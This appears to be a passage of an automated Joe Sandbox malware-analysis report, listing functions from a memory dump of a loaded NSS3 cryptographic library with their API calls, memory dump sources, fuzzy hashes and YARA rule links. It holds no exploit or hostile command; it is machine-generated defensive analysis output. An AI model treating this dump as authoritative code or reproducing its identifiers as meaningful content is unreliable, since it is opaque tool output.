                                                                                                                                                                                                                                                                                            • Part of subcall function 6C75C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C75DAE2,?), ref: 6C75C6C2
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75F0AE
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75F0C8
                                                                                                                                                                                                                                                                                          • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C75F101
                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C75F11D
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C82218C), ref: 6C75F183
                                                                                                                                                                                                                                                                                          • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C75F19A
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C75F1CB
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C75F1EF
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C75F210
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7052D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C75F1E9,?,00000000,?,?), ref: 6C7052F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7052D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C70530F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7052D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C705326
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7052D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C75F1E9,?,00000000,?,?), ref: 6C705340
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C75F227
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FAB0: free.MOZGLUE(?,-00000001,?,?,6C6EF673,00000000,00000000), ref: 6C74FAC7
                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C75F23E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C6FE708,00000000,00000000,00000004,00000000), ref: 6C74BE6A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7004DC,?), ref: 6C74BE7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C74BEC2
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C75F2BB
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C75F3A8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C75F3B3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C702D20: PK11_DestroyObject.NSS3(?,?), ref: 6C702D3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C702D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C702D5F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1559028977-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2160a3b7e7f0aa674cbfdb506fc8aa3b761c8f4384af9b5fe0313cf750037781
                                                                                                                                                                                                                                                                                          • Instruction ID: b496ecf24f5728a45fcbedc01fe1213680a6232eec61ec4434746c8c5551393c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2160a3b7e7f0aa674cbfdb506fc8aa3b761c8f4384af9b5fe0313cf750037781
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D18DB6E016059FEB00CFA9DA84A9EB7F5EF48308F588039D915A7711EB31EC15CB90
                                                                                                                                                                                                                                                                                          Function 6C78DE10 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C767FFA,00000000,?,6C7923B9,00000002,00000000,?,6C767FFA,00000002), ref: 6C78DE33
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C78D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C78DE74,6C767FFA,00000002,?,?,?,?,?,00000000,6C767FFA,00000000,?,6C7923B9,00000002), ref: 6C78D008
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C767FFA,00000000,?,6C7923B9,00000002,00000000,?,6C767FFA,00000002), ref: 6C78DE57
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00000088), ref: 6C78DEA5
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C78E069
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C78E121
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C78E14F
                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C78E195
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C78E1FC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C782460: PR_SetError.NSS3(FFFFE005,00000000,6C827379,00000002,?), ref: 6C782493
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
                                                                                                                                                                                                                                                                                          • String ID: application data$early application data$handshake data$key
                                                                                                                                                                                                                                                                                          • API String ID: 1461918828-2699248424
                                                                                                                                                                                                                                                                                          • Opcode ID: 38f75351c0b10241b2d861724166601f0d2e89f8ff04ee3a87f0b6964d016db1
                                                                                                                                                                                                                                                                                          • Instruction ID: df9e736dadf9e845280fdffcee2fc0322967aa4814d198d8a5743245e3200201
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38f75351c0b10241b2d861724166601f0d2e89f8ff04ee3a87f0b6964d016db1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DC13775B02209ABDB14CF65CE84BAAB7B4FF04308F144139EA199BA51E331E954CBE1
                                                                                                                                                                                                                                                                                          Function 6C67ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67ED0A
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67EE68
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67EF87
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C67EF98
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C67F492
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C67F483
                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C67F48D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 4101233201-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 8eb38eac3ea98ab4e7fbee6ef4f3f49b1e41fa3adcf1993e52b2fb7e2b3aeb09
                                                                                                                                                                                                                                                                                          • Instruction ID: 36e215bb19f63b311cfafd62a5d95a0431dd3cf0dfe5cf7365c74673ed9e4ca5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8eb38eac3ea98ab4e7fbee6ef4f3f49b1e41fa3adcf1993e52b2fb7e2b3aeb09
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64622530A04245CFEB24CF68C444B9ABBF1BF45318F284958D8555BB92D735E886CBFA
                                                                                                                                                                                                                                                                                          Function 6C71FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C71FD06
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C71F696
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C71F789
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C71F796
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C71F79F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C71F670: SECITEM_DupItem_Util.NSS3 ref: 6C71F7F0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PK11_GetAllTokens.NSS3 ref: 6C743481
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PR_SetError.NSS3(00000000,00000000), ref: 6C7434A3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: TlsGetValue.KERNEL32 ref: 6C74352E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: EnterCriticalSection.KERNEL32(?), ref: 6C743542
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C743440: PR_Unlock.NSS3(?), ref: 6C74355B
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C71FDAD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6F9003,?), ref: 6C74FD91
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: PORT_Alloc_Util.NSS3(A4686C75,?), ref: 6C74FDA2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C75,?,?), ref: 6C74FDC4
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C71FE00
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: free.MOZGLUE(00000000,?,?), ref: 6C74FDD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C73E5A0
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71FEBB
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C71FEC8
                                                                                                                                                                                                                                                                                          • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C71FED3
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C71FF0C
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C71FF23
                                                                                                                                                                                                                                                                                          • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C71FF4D
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C71FFDA
                                                                                                                                                                                                                                                                                          • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C720007
                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C720029
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C720044
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 138705723-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 76927b4a59c7116e717f37f82a4f8b29f95d2611a55f9d75124ef9c3772d5992
                                                                                                                                                                                                                                                                                          • Instruction ID: e2b0b61175186405a6f47f0fb828f1cac9911249e93cd431842600c3d71cba32
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76927b4a59c7116e717f37f82a4f8b29f95d2611a55f9d75124ef9c3772d5992
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39B1E6716083019FE704CF29C944A6AF7E5FF88308F59862DF95D97A42E770E944CB91
                                                                                                                                                                                                                                                                                          Function 6C717D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C717DDC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6F8298,?,?,?,6C6EFCE5,?), ref: 6C7507BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7507E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C75081B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C750825
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C717DF3
                                                                                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C717F07
                                                                                                                                                                                                                                                                                          • PK11_GetPadMechanism.NSS3(00000000), ref: 6C717F57
                                                                                                                                                                                                                                                                                          • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C717F98
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C717FC9
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C717FDE
                                                                                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C718000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C739430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C717F0C,?,00000000,00000000,00000000,?), ref: 6C73943B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C739430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C73946B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C739430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C739546
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C718110
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C71811D
                                                                                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C71822D
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C71823C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1923011919-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 5efe72857dde31508d0bc578013ac785e991ea96cd437326b0d2b3647fe2a32c
                                                                                                                                                                                                                                                                                          • Instruction ID: 9f4941e3bbd8c20a9291176a5270bc815f5f3443074a223b1d2e7c353d4cfa65
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5efe72857dde31508d0bc578013ac785e991ea96cd437326b0d2b3647fe2a32c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DC180B1D44219DFEB21CF14CD44FEAB7B9AB05348F0481E9E81DA6A41E7319E89CF90
                                                                                                                                                                                                                                                                                          Function 6C720EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6C720F8D
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C720FB3
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C721006
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C72101C
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C721033
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C72103F
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C721048
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C72108E
                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7210BB
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C7210D6
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C72112E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C721570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C7208C4,?,?), ref: 6C7215B8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C721570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C7208C4,?,?), ref: 6C7215C1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C721570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C72162E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C721570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C721637
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 0174c66a46d5172ad99257101b9849d472761f17ca7f584a89e217787b132b29
                                                                                                                                                                                                                                                                                          • Instruction ID: 145262125705a64f2889302504e7dbff99a60dc2c20b69fbebb33d58468824c3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0174c66a46d5172ad99257101b9849d472761f17ca7f584a89e217787b132b29
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B71BEB1A002058FDB24CFA9CE89A6AF7B0FF48318F148639E90997751E776D944CB91
                                                                                                                                                                                                                                                                                          Function 6C741CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C741F19
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C742166
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C74228F
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C7423B8
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C74241C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
